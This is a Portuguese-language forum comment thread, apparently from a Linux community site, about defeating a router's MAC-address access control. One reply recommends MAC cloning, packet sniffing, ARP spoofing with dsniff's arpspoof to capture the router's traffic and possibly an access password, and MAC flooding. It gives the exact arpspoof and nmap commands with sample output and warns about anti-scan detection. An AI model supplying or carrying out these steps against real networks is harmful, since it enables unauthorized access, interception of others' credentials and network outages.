[7] Comentário enviado por VandersonDiniz em 25/10/2013 - 14:28h:
Beleza Miqueloti.
Pretendo realizar o mesmo teste em breve. Desta vez vou realizar uma captura de pacotes e ver o que consigo.
Se os resultados forem positivos, voltarei aqui e descrevo com detalhes.
Vamos aguardar também a resposta de Pedro.
Até mais!
Cara o jeito mais fácil é mesmo tentar clonar um MAC já que é o próprio roteador que faz o controle, larga um snifer escutando e deixa rolar...
Você também pode tentar fazer um arpspoof para capturar os pacotes que são enviados ao roteador - quem sabe não consiga o MAC e uma senha de acesso :)
Pesquise pelo pacote "dsniff" e tutoriais sobre os aplicativos que vem nele (tem bastante coisa boa lá)
Pode-se tentar fazer um macflood também de modo que o roteador não consiga mais controlar os MAC, mas essa opção é só se as outras falharem pois pode causar paradas na rede, de inicio comesse com poucos pacotes e veja os resultados.
Para descobrir o MAC de um determinado ip você pode usar o arpspoof (presente no pacote dsniff), para isto basta:
Usage: arpspoof [-i interface] [-t target] host
arpspoof -i eth0 -t 192.168.1.1 192.168.1.5
onde eth0 é sua placa de saída de rede
192.168.1.1 é o ip do roteador
e 192.168.1.5 é o ip do pc que você quer o número MAC
basta você deixar "pingar" umas 6 vezes e apertar ctrl+c em baixo estará o número MAC, exemplo com pc e uma VM:
[px@Casa ~]$ sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.5
0:e0:1a:1a:0r:1d 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 0:e0:1a:1a:0r:1d
0:e0:1a:1a:0r:1d 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 0:e0:1a:1a:0r:1d
0:e0:1a:1a:0r:1d 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 0:e0:1a:1a:0r:1d
0:e0:1a:1a:0r:1d 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 0:e0:1a:1a:0r:1d
0:e0:1a:1a:0r:1d 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 0:e0:1a:1a:0r:1d
^C8:0:27:ab:ad:15 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 8:0:27:ab:ad:15
8:0:27:ab:ad:15 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 8:0:27:ab:ad:15
8:0:27:ab:ad:15 13:1b:13:35:a1:9 0806 42: arp reply 192.168.1.5 is-at 8:0:27:ab:ad:15
OBS: estes números são ips e MACs fictícios para exemplificar a técnica de arpspoof
Na linha com ^C é onde eu parei o programa (ctrl +c)
Conferindo o MAC da vm...
[px@Casa ~]$ arp -a
? (192.168.1.1) at 0:e0:1a:1a:0r:1d [ether] on eth0
? (192.168.1.5) at 08:00:27:ab:ad:15 [ether] on eth0
Podemos observar que os zeros só aparecem uma vez 8:0:27:ab:ad:15 (número obtido pelo arpspoof) // 08:00:27:ab:ad:15 (número MAC válido)
basta onde tiver uma única casa com um único zero colocar mais um zero
Se quiser mapear a rede antes (caso não saiba os ips) use o nmap
nmap -sP 192.168.1.0/24
OBS: Só cuidado para não cair em nenhuma regra de "anti-scan" fazendo isto e ter seu acesso bloqueado!!!
Boa sorte! :)